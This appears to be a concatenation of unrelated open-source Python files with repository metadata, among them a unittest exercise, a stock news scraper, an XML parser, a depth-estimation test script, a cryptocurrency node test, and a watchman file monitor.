c1e18007364f282be06666ff19699ae17252873e
|
[] |
no_license
|
danhagg/python_bits
|
cb407624d48a52d4fceacd2c4fca762abe3dd1ef
|
c5844fe464c6e896b1597d95f5a89b2cf66dc605
|
refs/heads/master
| 2020-03-18T13:16:53.014910
| 2018-09-17T16:26:06
| 2018-09-17T16:26:06
| 134,773,305
| 1
| 0
| null | 2018-07-11T22:23:09
| 2018-05-24T22:03:08
|
Python
|
UTF-8
|
Python
| false
| false
| 774
|
py
|
import unittest
from name_function import get_formatted_name
# following class inherits from class unittest.TestCase
class NamesTestCase(unittest.TestCase):
"""Tests for 'name_function.py'."""
# method to verify names with 1st and last formatted correctly
# method must start with "test"
def test_first_last_name(self):
"""Do names like 'Janis Joplin' work?"""
formatted_name = get_formatted_name('janis', 'joplin')
self.assertEqual(formatted_name, 'Janis Joplin')
def test_first_last_middle_name(self):
"""Do names like 'Wolfgnag Amadeus Mozart' work"""
formatted_name = get_formatted_name(
'wolfgang', 'mozart', 'amadeus')
self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')
unittest.main()
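# A minimal name_function.py satisfying both tests might look like this
# (editor's sketch -- the real module is not included in this record):
#
#     def get_formatted_name(first, last, middle=''):
#         if middle:
#             full_name = first + ' ' + middle + ' ' + last
#         else:
#             full_name = first + ' ' + last
#         return full_name.title()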
|
[
"danielhaggerty1976@gmail.com"
] |
danielhaggerty1976@gmail.com
|
c5d84ee44df35183938e7658a8aebaef5e4731ad
|
db575f3401a5e25494e30d98ec915158dd7e529b
|
/BIO_Stocks/AVEO.py
|
2c70d486a632cd0540110768b8144b09fb08d86a
|
[] |
no_license
|
andisc/StockWebScraping
|
b10453295b4b16f065064db6a1e3bbcba0d62bad
|
41db75e941cfccaa7043a53b0e23ba6e5daa958a
|
refs/heads/main
| 2023-08-08T01:33:33.495541
| 2023-07-22T21:41:08
| 2023-07-22T21:41:08
| 355,332,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,074
|
py
|
import requests
from lxml import html
from bs4 import BeautifulSoup
import os
from datetime import date, datetime
from ValidationTools import validateday
from Database_Connections import InsertData, Insert_Logging
def main(id_control):
try:
url = 'https://investor.aveooncology.com/press-releases'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
result = requests.get(url, headers=headers)
#print(result.content.decode())
html_content = result.content.decode()
soup = BeautifulSoup(html_content, 'html.parser')
#print(soup)
table = soup.find('table', attrs={'class':'nirtable collapse-wide'})
#print(table)
table_body = table.find('tbody')
rows = table_body.find_all('tr')
FIRST_ROW_columns = rows[0].find_all('td')
v_article_date = FIRST_ROW_columns[0].text.lstrip().rstrip()
article_desc = FIRST_ROW_columns[1]
        # if the process finds any article dated today
istoday, v_art_date = validateday(v_article_date)
if (istoday == True):
v_ticker = os.path.basename(__file__).replace(".py", "")
v_url = article_desc.a.get('href')
v_description = article_desc.text.lstrip().rstrip()
now = datetime.now()
print("URL: " + v_url)
print("DESCRIPTION: " + v_description)
print("ARTICLE_DATE: " + str(now))
# Insert articles
if "https://" in v_url:
InsertData(v_ticker, v_description, v_url, v_art_date)
else:
InsertData(v_ticker, v_description, url, v_art_date)
except Exception:
error_message = "Entrou na excepção ao tratar " + os.path.basename(__file__) + "..."
print(error_message)
Insert_Logging(id_control, 'Detail', error_message)
pass
if __name__ == "__main__":
    main(None)  # main() requires an id_control argument; pass a placeholder when run standalone
|
[
"andisc_3@hotmail.com"
] |
andisc_3@hotmail.com
|
0f189006b7427ff0c47c6218323a7613f0be1eea
|
6aee8ef9efcc43a611d1f6d8ebc9ba5c9234d0c7
|
/xml/sample1.py
|
7f3bb35ab48bcab97514ea1ba485832420509784
|
[] |
no_license
|
huython/python_tutorialspoint
|
276bbaba341229d4c2f1b71a4865b8bd7e50b72b
|
dff9e0e53c68403af034a98ba299d75588481293
|
refs/heads/master
| 2020-03-29T15:35:29.202894
| 2018-09-24T08:02:43
| 2018-09-24T08:02:43
| 150,071,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,999
|
py
|
#!/usr/bin/python
import xml.sax
class MovieHandler( xml.sax.ContentHandler ):
def __init__(self):
self.CurrentData = ""
self.type = ""
self.format = ""
self.year = ""
self.rating = ""
self.stars = ""
self.description = ""
# Call when an element starts
def startElement(self, tag, attributes):
self.CurrentData = tag
if tag == "movie":
print("*****Movie*****")
title = attributes["title"]
print("Title:", title)
# Call when an elements ends
def endElement(self, tag):
if self.CurrentData == "type":
print("Type:", self.type)
elif self.CurrentData == "format":
print("Format:", self.format)
elif self.CurrentData == "year":
print("Year:", self.year)
elif self.CurrentData == "rating":
print("Rating:", self.rating)
elif self.CurrentData == "stars":
print("Stars:", self.stars)
elif self.CurrentData == "description":
print("Description:", self.description)
self.CurrentData = ""
# Call when a character is read
def characters(self, content):
if self.CurrentData == "type":
self.type = content
elif self.CurrentData == "format":
self.format = content
elif self.CurrentData == "year":
self.year = content
elif self.CurrentData == "rating":
self.rating = content
elif self.CurrentData == "stars":
self.stars = content
elif self.CurrentData == "description":
self.description = content
if ( __name__ == "__main__"):
# create an XMLReader
parser = xml.sax.make_parser()
# turn off namespaces
parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# override the default ContentHandler
Handler = MovieHandler()
parser.setContentHandler( Handler )
parser.parse("./xml/movies.xml")
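# The handler above assumes a movies.xml shaped roughly like this
# (editor's sketch inferred from the tag names; the actual file is not shown):
#
#     <collection>
#         <movie title="Enemy Behind">
#             <type>War, Thriller</type>
#             <format>DVD</format>
#             <year>2003</year>
#             <rating>PG</rating>
#             <stars>10</stars>
#             <description>Talk about a US-Japan war</description>
#         </movie>
#     </collection>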
|
[
"huysamdua@yahoo.com"
] |
huysamdua@yahoo.com
|
43524050673b775d0d91efafd58f41dfb3e062a8
|
b6d8570a6ad4891858f475481bd2b7faa9db3df6
|
/avg bg.py
|
da5c282b8c462e864eea2da5d1d0b73d43ed4f82
|
[] |
no_license
|
Mayank-Bhatt-450/mpl-can-jump-bot
|
9c0738f4a9395ecdc3cf61960cac586141ced723
|
1d13bf1fd49e7455c15dbf97d2f28b3882ea5660
|
refs/heads/main
| 2022-12-26T01:47:40.504723
| 2020-10-07T14:44:41
| 2020-10-07T14:44:41
| 302,066,853
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,385
|
py
|
import pyautogui,time
from PIL import Image
import math,PIL
'''
img = pyautogui.screenshot()
img.save('new.jpg')
k=time.time()'''
#8 100
u=[0,0,0]
l=[112,194,127]
def dis(pt1,pt2=(2,35,47)):
#pt1=[170,10,154]
#pt2=(145,35,43)#(145,144,143)#(145,35,43)
distance=math.sqrt(((pt1[0]-pt2[0])**2)+((pt1[1]-pt2[1])**2)+((pt1[2]-pt2[2])**2))
return(distance)
img = Image.open("000.png")#PIL.ImageGrab.grab()#
distance=[]
no=[(254, 231, 94), (254, 208, 100), (254, 186, 108), (254, 163, 115), (254, 147, 119), (254, 117, 129), (254, 94, 135), (254, 71, 143)]
h=0
for y in range(100,900,100):
print(y)
g=[]
k=0
pix=[0,0,0]
pixno=0
for i in range(100):
for x in range(497,505):#,943):
if y>800:
print(x,y+i)
d=img.getpixel((x,y+i))
#print(d)
if d[1]>10 and d[0]>10:#dis(d,[170,10,154])>10 and
pixno+=1
pix[0]+=d[0]
pix[1]+=d[1]
pix[2]+=d[2]
fr=dis(d,no[h])
if k<fr :
k=fr
print(d,',')
distance.append(k)
#no.append((round(pix[0]/pixno),round(pix[1]/pixno),round(pix[2]/pixno)))
#print(k,pix[0],pixno,pix[1],pixno,pix[2],pixno)
print(k,pix[0]/pixno,pix[1]/pixno,pix[2]/pixno)
h+=1
print (no)
print (distance)
|
[
"mayankbhatt457@gmail.com"
] |
mayankbhatt457@gmail.com
|
ee65724f760436a1ddd06deee521690fd06da96f
|
906579c9bb9330d0b35644f2cd45f7cd53881234
|
/test.py
|
968e828b5fcb6089889c756cd9cf3e2128580fb9
|
[] |
no_license
|
albert100121/Stereo-LiDAR-CCVNorm
|
cda767518684ff769c2c4507bed58fe5431ad152
|
c40b09e08c6416ad9f7959aec8ed1160ca216bec
|
refs/heads/master
| 2020-09-05T19:50:33.806036
| 2019-06-21T20:49:33
| 2019-06-21T20:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,615
|
py
|
"""
Testing process.
Usage:
# For KITTI Depth Completion
>> python test.py --model_cfg exp/test/test_options.py --model_path exp/test/ckpt/\[ep-00\]giter-0.ckpt \
--dataset kitti2017 --rgb_dir ./data/kitti2017/rgb --depth_dir ./data/kitti2015/depth
# For KITTI Stereo
>> python test.py --model_cfg exp/test/test_options.py --model_path exp/test/ckpt/\[ep-00\]giter-0.ckpt \
--dataset kitti2015 --root_dir ./data/kitti_stereo/data_scene_flow
"""
import os
import sys
import time
import argparse
import importlib
import random
import numpy as np
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
import torch.backends.cudnn as cudnn
from misc import utils
from misc import metric
from dataset.dataset_kitti2017 import DatasetKITTI2017
from dataset.dataset_kitti2015 import DatasetKITTI2015
DISP_METRIC_FIELD = ['err_3px', 'err_2px', 'err_1px', 'rmse', 'mae']
DEPTH_METRIC_FIELD = ['rmse', 'mae', 'mre', 'irmse', 'imae']
SEED = 100
random.seed(SEED)
np.random.seed(seed=SEED)
cudnn.deterministic = True
cudnn.benchmark = False
torch.manual_seed(SEED)
torch.cuda.manual_seed_all(SEED)
def parse_arg():
parser = argparse.ArgumentParser(description='Sparse-Depth-Stereo testing')
parser.add_argument('--model_cfg', dest='model_cfg', type=str, default=None,
help='Configuration file (options.py) of the trained model.')
parser.add_argument('--model_path', dest='model_path', type=str, default=None,
help='Path to weight of the trained model.')
parser.add_argument('--dataset', dest='dataset', type=str, default='kitti2017',
help='Dataset used: kitti2015 / kitti2017')
parser.add_argument('--rgb_dir', dest='rgb_dir', type=str, default='./data/kitti2017/rgb',
help='Directory of RGB data for kitti2017.')
parser.add_argument('--depth_dir', dest='depth_dir', type=str, default='./data/kitti2017/depth',
help='Directory of depth data for kitti2015.')
parser.add_argument('--root_dir', dest='root_dir', type=str, default='./data/kitti_stereo/data_scene_flow',
help='Root directory for kitti2015')
parser.add_argument('--random_sampling', dest='random_sampling', type=float, default=None,
help='Perform random sampling on ground truth to obtain sparse disparity map; Only used in kitti2015')
parser.add_argument('--no_cuda', dest='no_cuda', action='store_true',
help='Don\'t use gpu')
parser.set_defaults(no_cuda=False)
args = parser.parse_args()
return args
def main():
# Parse arguments
args = parse_arg()
# Import configuration file
sys.path.append('/'.join((args.model_cfg).split('/')[:-1]))
options = importlib.import_module(((args.model_cfg).split('/')[-1]).split('.')[0])
cfg = options.get_config()
# Define model and load
model = options.get_model(cfg.model_name)
if not args.no_cuda:
model = model.cuda()
train_ep, train_step = utils.load_checkpoint(model, None, None, args.model_path, True)
# Define testing dataset (NOTE: currently using validation set)
if args.dataset == 'kitti2017':
dataset = DatasetKITTI2017(args.rgb_dir, args.depth_dir, 'my_test',
(256, 1216), to_disparity=cfg.to_disparity, # NOTE: set image size to 256x1216
fix_random_seed=True)
elif args.dataset == 'kitti2015':
dataset = DatasetKITTI2015(args.root_dir, 'training', (352, 1216), # NOTE: set image size to 352x1216
args.random_sampling, fix_random_seed=True)
loader = DataLoader(dataset, batch_size=1, shuffle=False, pin_memory=True,
num_workers=4)
# Perform testing
model.eval()
pbar = tqdm(loader)
pbar.set_description('Testing')
disp_meters = metric.Metrics(DISP_METRIC_FIELD)
disp_avg_meters = metric.MovingAverageEstimator(DISP_METRIC_FIELD)
depth_meters = metric.Metrics(DEPTH_METRIC_FIELD)
depth_avg_meters = metric.MovingAverageEstimator(DEPTH_METRIC_FIELD)
infer_time = 0
with torch.no_grad():
for it, data in enumerate(pbar):
# Pack data
if not args.no_cuda:
for k in data.keys():
data[k] = data[k].cuda()
inputs = dict()
inputs['left_rgb'] = data['left_rgb']
inputs['right_rgb'] = data['right_rgb']
if cfg.to_disparity:
inputs['left_sd'] = data['left_sdisp']
inputs['right_sd'] = data['right_sdisp']
else:
inputs['left_sd'] = data['left_sd']
inputs['right_sd'] = data['right_sd']
if args.dataset == 'kitti2017':
target_d = data['left_d']
target_disp = data['left_disp']
img_w = data['width'].item()
# Inference
end = time.time()
pred = model(inputs)
if cfg.to_disparity:
pred_d = utils.disp2depth(pred, img_w)
pred_disp = pred
else:
raise NotImplementedError
infer_time += (time.time() - end)
# Measure performance
if cfg.to_disparity:
# disparity
pred_disp_np = pred_disp.data.cpu().numpy()
target_disp_np = target_disp.data.cpu().numpy()
disp_results = disp_meters.compute(pred_disp_np, target_disp_np)
disp_avg_meters.update(disp_results)
if args.dataset == 'kitti2017':
# depth
pred_d_np = pred_d.data.cpu().numpy()
target_d_np = target_d.data.cpu().numpy()
depth_results = depth_meters.compute(pred_d_np, target_d_np)
depth_avg_meters.update(depth_results)
else:
raise NotImplementedError
infer_time /= len(loader)
if cfg.to_disparity:
disp_avg_results = disp_avg_meters.compute()
print('Disparity metric:')
for key, val in disp_avg_results.items():
print('- {}: {}'.format(key, val))
if args.dataset == 'kitti2017':
depth_avg_results = depth_avg_meters.compute()
print('Depth metric:')
for key, val in depth_avg_results.items():
print('- {}: {}'.format(key, val))
print('Average infer time: {}'.format(infer_time))
if __name__ == '__main__':
main()
|
[
"johnsonwang0810@gmail.com"
] |
johnsonwang0810@gmail.com
|
73b312b68b541356d85fb0d14bea0e3ef11466ee
|
d7c9e5b45128c06997358987c8563fba1387c483
|
/Modules/SortingLists.py
|
bbae23b5e4c47d487e64d78f3928e61214747808
|
[] |
no_license
|
Shadow073180/pythonPractice
|
1ed389d448d82c91e796951f15c5ce81fbedb73e
|
52d4f77109b0ffdaf8eab8094fe90b0dbab5a595
|
refs/heads/main
| 2023-03-28T06:01:00.090517
| 2021-03-17T19:56:58
| 2021-03-17T19:56:58
| 348,491,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
# Given a list with pairs, sort on the first element.
def sort_list_with_pairs_on_first_element(collection):
collection.sort(key=lambda x:x[0])
print(collection)
# Now sort on the second element
def sort_list_with_pairs_on_second_element(collection):
collection.sort(key=lambda x: x[1])
print(collection)
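# Quick demonstration (editor's addition):
if __name__ == '__main__':
    pairs = [(3, 'c'), (1, 'b'), (2, 'a')]
    sort_list_with_pairs_on_first_element(pairs)   # [(1, 'b'), (2, 'a'), (3, 'c')]
    sort_list_with_pairs_on_second_element(pairs)  # [(2, 'a'), (1, 'b'), (3, 'c')]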
|
[
"david@Davids-MacBook-Pro.local"
] |
david@Davids-MacBook-Pro.local
|
8519415c25b3fb42b6fabb878d849032a11561a9
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/131/usersdata/260/38306/submittedfiles/al10.py
|
cf5bced616d8a83beddc4f52cebb3f6fea0b85b8
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 278
|
py
|
# -*- coding: utf-8 -*-
#DO NOT DELETE THE LINE ABOVE. START BELOW THIS LINE
n=int(input("digite o número de termos desejado:"))
produto=1
for i in range (1,n+1,2):
    if n%2 == 0:
        produto=produto*((i)/(i+1))
    else:
        produto=produto*((i+1)/(i))
print(produto)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
b422f5580abaf8f49648efea46f5591864331eb3
|
e262e64415335060868e9f7f73ab8701e3be2f7b
|
/.history/pyexcel_20201111161453.py
|
9ea777441d71ece291b7eaecf8bd2f954d7a1fdc
|
[] |
no_license
|
Allison001/developer_test
|
6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63
|
b8e04b4b248b0c10a35e93128a5323165990052c
|
refs/heads/master
| 2023-06-18T08:46:40.202383
| 2021-07-23T03:31:54
| 2021-07-23T03:31:54
| 322,807,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
from openpyxl import Workbook
from openpyxl.utils import get_column_letter
wb = Workbook()
dest_filename = 'empty_book.xlsx'
ws1 = wb.active
ws1.title = "range names"
for row in range(1, 40):
ws1.append(range(600))
ws2 = wb.create_sheet(title="Pi")
ws2['F5'] = 3.14
ws3 = wb.create_sheet(title="Data")
for row in range(10, 20):
for col in range(27, 54):
_ = ws3.cell(column=col, row=row, value="{0}".format(get_column_letter(col)))
print(ws3['AA10'].value)
ws4 = wb.create_sheet(title="test")
title1 = ("用例编号","用例模块","用例标题","用例级别","测试环境","测试输入","执行操作","预期结果","验证结果","备注")
for i in range(1,11):
    ws4.cell(column=i, row=1).value = title1[i-1]  # write each header from title1 instead of repeating the first one
wb.save(filename = dest_filename)
|
[
"zhangyingxbba@gmail.com"
] |
zhangyingxbba@gmail.com
|
ab888ea5d10530619540dd87dcd6a094a9ab20c1
|
8b957ec62991c367dfc6c9247ada90860077b457
|
/test/functional/p2p_invalid_block.py
|
5d51372d2d6595212073953a66767b2570a5c199
|
[
"MIT"
] |
permissive
|
valuero-org/valuero
|
113f29046bd63c8b93160604452a99ed51367942
|
c0a8d40d377c39792e5a79d4a67f00bc592aef87
|
refs/heads/master
| 2020-05-24T17:44:46.409378
| 2019-09-09T10:18:59
| 2019-09-09T10:18:59
| 187,392,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,470
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Copyright (c) 2018-2019 The Rito Core developers
# Copyright (c) 2019 The Valuero developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test node responses to invalid blocks.
In this test we connect to one node over p2p, and test block requests:
1) Valid blocks should be requested and become chain tip.
2) Invalid block with duplicated transaction should be re-requested.
3) Invalid block with bad coinbase value should be rejected and not
re-requested.
"""
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.blocktools import *
import copy
import time
# Use the ComparisonTestFramework with 1 node: only use --testbinary.
class InvalidBlockRequestTest(ComparisonTestFramework):
''' Can either run this test as 1 node with expected answers, or two and compare them.
Change the "outcome" variable from each TestInstance object to only do the comparison. '''
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
test = TestManager(self, self.options.tmpdir)
test.add_all_connections(self.nodes)
self.tip = None
self.block_time = None
NetworkThread().start() # Start up network handling in another thread
test.run()
def get_tests(self):
if self.tip is None:
self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
self.block_time = int(time.time())+1
'''
Create a new block with an anyone-can-spend coinbase
'''
height = 1
block = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
yield TestInstance([[block, True]])
'''
Now we need that block to mature so we can spend the coinbase.
'''
test = TestInstance(sync_every_block=False)
for i in range(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.tip = block.sha256
self.block_time += 1
test.blocks_and_transactions.append([block, True])
height += 1
yield test
'''
Now we use merkle-root malleability to generate an invalid block with
same blockheader.
Manufacture a block with 3 transactions (coinbase, spend of prior
coinbase, spend of that spend). Duplicate the 3rd transaction to
leave merkle root and blockheader unchanged but invalidate the block.
'''
block2 = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
# b'0x51' is OP_TRUE
tx1 = create_transaction(self.block1.vtx[0], 0, b'\x51', 5000 * COIN)
tx2 = create_transaction(tx1, 0, b'\x51', 5000 * COIN)
block2.vtx.extend([tx1, tx2])
block2.hashMerkleRoot = block2.calc_merkle_root()
block2.rehash()
block2.solve()
orig_hash = block2.sha256
block2_orig = copy.deepcopy(block2)
# Mutate block 2
block2.vtx.append(tx2)
assert_equal(block2.hashMerkleRoot, block2.calc_merkle_root())
assert_equal(orig_hash, block2.rehash())
assert(block2_orig.vtx != block2.vtx)
self.tip = block2.sha256
yield TestInstance([[block2, RejectResult(16, b'bad-txns-duplicate')], [block2_orig, True]])
height += 1
'''
Make sure that a totally screwed up block is not valid.
'''
block3 = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block3.vtx[0].vout[0].nValue = 100 * COIN # Too high!
block3.vtx[0].sha256=None
block3.vtx[0].calc_sha256()
block3.hashMerkleRoot = block3.calc_merkle_root()
block3.rehash()
block3.solve()
yield TestInstance([[block3, RejectResult(16, b'bad-cb-amount')]])
if __name__ == '__main__':
InvalidBlockRequestTest().main()
|
[
"rishabhworking@gmail.com"
] |
rishabhworking@gmail.com
|
a817828844765fa43ba5993b23bb82b037a2711f
|
b4fd46f1f9c7b7d3f78df723d8aa34c8a65edb1a
|
/src/hupper/watchman.py
|
00b923fe217e9791afe2f80e24cfb82858ff3c69
|
[
"MIT"
] |
permissive
|
ProstoMaxim/hupper
|
b0bf6123c58b96eb6d97b5797fc57e390efbf513
|
46a46af2c459fb82884b205a47211b587aa05749
|
refs/heads/master
| 2020-03-29T19:50:51.316020
| 2018-09-25T15:14:43
| 2018-09-25T15:14:43
| 150,283,612
| 0
| 0
|
MIT
| 2018-09-25T14:57:55
| 2018-09-25T14:57:55
| null |
UTF-8
|
Python
| false
| false
| 4,130
|
py
|
# check ``hupper.utils.is_watchman_supported`` before using this module
import json
import os
import socket
import threading
import time
from .compat import PY2
from .interfaces import IFileMonitor
from .utils import get_watchman_sockpath
class WatchmanFileMonitor(threading.Thread, IFileMonitor):
"""
An :class:`hupper.interfaces.IFileMonitor` that uses Facebook's
``watchman`` daemon to detect changes.
``callback`` is a callable that accepts a path to a changed file.
"""
def __init__(
self,
callback,
logger,
sockpath=None,
binpath='watchman',
timeout=1.0,
**kw
):
super(WatchmanFileMonitor, self).__init__()
self.callback = callback
self.logger = logger
self.paths = set()
self.dirpaths = set()
self.lock = threading.Lock()
self.enabled = True
self.sockpath = sockpath
self.binpath = binpath
self.timeout = timeout
def add_path(self, path):
with self.lock:
dirpath = os.path.dirname(path)
if dirpath not in self.dirpaths:
self._schedule(dirpath)
self.dirpaths.add(dirpath)
if path not in self.paths:
self.paths.add(path)
def start(self):
sockpath = self._resolve_sockpath()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect(sockpath)
self._sock = sock
self._recvbufs = []
self._send(['version'])
result = self._recv()
self.logger.debug('Connected to watchman v' + result['version'] + '.')
super(WatchmanFileMonitor, self).start()
def join(self):
try:
return super(WatchmanFileMonitor, self).join()
finally:
self._sock.close()
self._sock = None
def run(self):
while self.enabled:
try:
result = self._recv()
if 'error' in result:
self.logger.error('watchman error=' + result['error'])
elif 'subscription' in result:
root = result['root']
files = result['files']
with self.lock:
for f in files:
path = os.path.join(root, f)
if path in self.paths:
self.callback(path)
except socket.timeout:
pass
def stop(self):
self.enabled = False
def _resolve_sockpath(self):
if self.sockpath:
return self.sockpath
return get_watchman_sockpath(self.binpath)
def _schedule(self, dirpath):
self._send([
'subscribe',
dirpath,
dirpath,
{
# +1 second because we don't want any buffered changes
# if the daemon is already watching the folder
'since': int(time.time() + 1),
'expression': [
'type', 'f',
],
'fields': ['name'],
},
])
def _readline(self):
# buffer may already have a line
if len(self._recvbufs) == 1 and b'\n' in self._recvbufs[0]:
line, b = self._recvbufs[0].split(b'\n', 1)
self._recvbufs = [b]
return line
while True:
b = self._sock.recv(4096)
if not b:
raise RuntimeError('lost connection to watchman')
if b'\n' in b:
result = b''.join(self._recvbufs)
line, b = b.split(b'\n', 1)
                self._recvbufs = [b]  # keep the remainder buffered (self.buf was a typo nothing reads)
return result + line
self._recvbufs.append(b)
def _recv(self):
line = self._readline()
if not PY2:
line = line.decode('utf8')
return json.loads(line)
def _send(self, msg):
cmd = json.dumps(msg)
if not PY2:
cmd = cmd.encode('ascii')
self._sock.sendall(cmd + b'\n')
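# Usage sketch (editor's addition; the logger and callback are placeholders):
#
#     import logging
#     monitor = WatchmanFileMonitor(
#         callback=lambda path: print('changed:', path),
#         logger=logging.getLogger('hupper'),
#     )
#     monitor.add_path('/path/to/watched/file.py')
#     monitor.start()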
|
[
"michael@merickel.org"
] |
michael@merickel.org
|
17fe14c4e6fa06e9f9f2562f8672e56c946a0ac6
|
5ca85847885c6fd6f9728b0b2dffb66e96a81a1d
|
/hemlock/app/routes/base_routing.py
|
c31895ffe2bf37417fd7aa109647fcf91a13ebb4
|
[] |
no_license
|
syfreed/hemlock_test2
|
682d843636883a6a2b883932cd7282e9b865ebcd
|
61933fd17630ddd1bb46d8f2090b1b039a3b4e99
|
refs/heads/master
| 2020-08-03T11:21:18.460905
| 2019-09-29T22:36:36
| 2019-09-29T22:36:36
| 211,733,895
| 0
| 0
| null | 2019-10-22T14:21:27
| 2019-09-29T22:25:30
|
Python
|
UTF-8
|
Python
| false
| false
| 1,489
|
py
|
"""Base routing functions"""
from hemlock.app.factory import bp, db, login_manager
from hemlock.database.models import Participant, Navbar, Brand, Navitem, Dropdownitem
from hemlock.database.private import DataStore
from flask import current_app, url_for
@login_manager.user_loader
def load_user(id):
return Participant.query.get(int(id))
@bp.before_app_first_request
def init_app():
"""Create database tables and initialize data storage models
Additionally, set a scheduler job to log the status periodically.
"""
db.create_all()
if not DataStore.query.first():
DataStore()
if not Navbar.query.filter_by(name='researcher_navbar').first():
create_researcher_navbar()
db.session.commit()
current_app.apscheduler.add_job(
func=log_current_status, trigger='interval',
seconds=current_app.status_log_period.seconds,
args=[current_app._get_current_object()], id='log_status'
)
def create_researcher_navbar():
navbar = Navbar(name='researcher_navbar')
Brand(bar=navbar, label='Hemlock')
Navitem(
bar=navbar, url=url_for('hemlock.participants'), label='Participants')
Navitem(bar=navbar, url=url_for('hemlock.download'), label='Download')
Navitem(bar=navbar, url=url_for('hemlock.logout'), label='Logout')
return navbar
def log_current_status(app):
with app.app_context():
ds = DataStore.query.first()
ds.log_status()
db.session.commit()
|
[
"dsbowen@wharton.upenn.edu"
] |
dsbowen@wharton.upenn.edu
|
80d23caed9eb691e211165bc984de9bfe7b6c3d1
|
da9ce50833e5292d27e14d31ee90c5bcc410d71b
|
/survol/sources_types/CIM_Process/wbem_process_info.py
|
a51c26e47d53d0bdf1863f69b2a7c8f529808775
|
[] |
no_license
|
Tiancheng-Luo/survol
|
10367b6b923f7095574436bb44fd5189b1e49160
|
30c7f771010462cd865480986abfe1045429f021
|
refs/heads/master
| 2022-11-26T16:02:46.852058
| 2020-07-25T07:28:34
| 2020-07-25T07:28:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,277
|
py
|
#!/usr/bin/env python
"""
WBEM CIM_Process information.
"""
import sys
import lib_util
import lib_common
import lib_wbem
from lib_properties import pc
Usable = lib_util.UsableLinux
CanProcessRemote = True
def Main():
# TODO: can_process_remote should be suppressed because it duplicates CanProcessRemote
cgiEnv = lib_common.CgiEnv(can_process_remote=True)
pid = int(cgiEnv.GetId())
machine_name = cgiEnv.GetHost()
grph = cgiEnv.GetGraph()
cimom_url = lib_wbem.HostnameToWbemServer(machine_name)
DEBUG("wbem_process_info.py currentHostname=%s pid=%d machine_name=%s cimom_url=%s",
lib_util.currentHostname, pid, machine_name, cimom_url)
conn_wbem = lib_wbem.WbemConnection(cimom_url)
name_space = "root/cimv2"
try:
inst_lists = conn_wbem.ExecQuery("WQL", 'select * from CIM_Process where Handle="%s"' % pid, name_space)
except:
lib_common.ErrorMessageHtml("Error:" + str(sys.exc_info()))
class_name = "CIM_Process"
dict_props = {"Handle": pid}
root_node = lib_util.EntityClassNode(class_name, name_space, cimom_url, "WBEM")
# There should be only one object, hopefully.
for an_inst in inst_lists:
dict_inst = dict(an_inst)
host_only = lib_util.EntHostToIp(cimom_url)
if lib_util.IsLocalAddress(host_only):
uri_inst = lib_common.gUriGen.UriMakeFromDict(class_name, dict_props)
else:
uri_inst = lib_common.RemoteBox(host_only).UriMakeFromDict(class_name, dict_props)
grph.add((root_node, lib_common.MakeProp(class_name), uri_inst))
url_namespace = lib_wbem.NamespaceUrl(name_space, cimom_url, class_name)
nod_namespace = lib_common.NodeUrl(url_namespace)
grph.add((root_node, pc.property_cim_subnamespace, nod_namespace))
# None properties are not printed.
for iname_key in dict_inst:
iname_val = dict_inst[iname_key]
# TODO: If this is a reference, create a Node !!!!!!!
if not iname_val is None:
grph.add((uri_inst, lib_common.MakeProp(iname_key), lib_common.NodeLiteral(iname_val)))
# TODO: Call the method Associators(). Idem References().
cgiEnv.OutCgiRdf()
if __name__ == '__main__':
Main()
|
[
"remi.chateauneu@gmail.com"
] |
remi.chateauneu@gmail.com
|
6ce9270ac0a7bc5542a7cd5fc4ade24fab776cb6
|
907b3bbd44c95be1542a36feaadb6a71b724579f
|
/files/usr/tmp/pip-build-nyxh8e0k/google-cloud-vision/google/cloud/vision/likelihood.py
|
6239efe18251f74ee337f3573ab128b3df84470d
|
[] |
no_license
|
vo0doO/com.termux
|
2d8f536c1a5dbd7a091be0baf181e51f235fb941
|
c97dd7b906e5ef3ec157581fd0bcadd3e3fc220e
|
refs/heads/master
| 2020-12-24T09:40:30.612130
| 2016-11-21T07:47:25
| 2016-11-21T07:47:25
| 73,282,539
| 2
| 2
| null | 2020-07-24T21:33:03
| 2016-11-09T12:33:01
|
Python
|
UTF-8
|
Python
| false
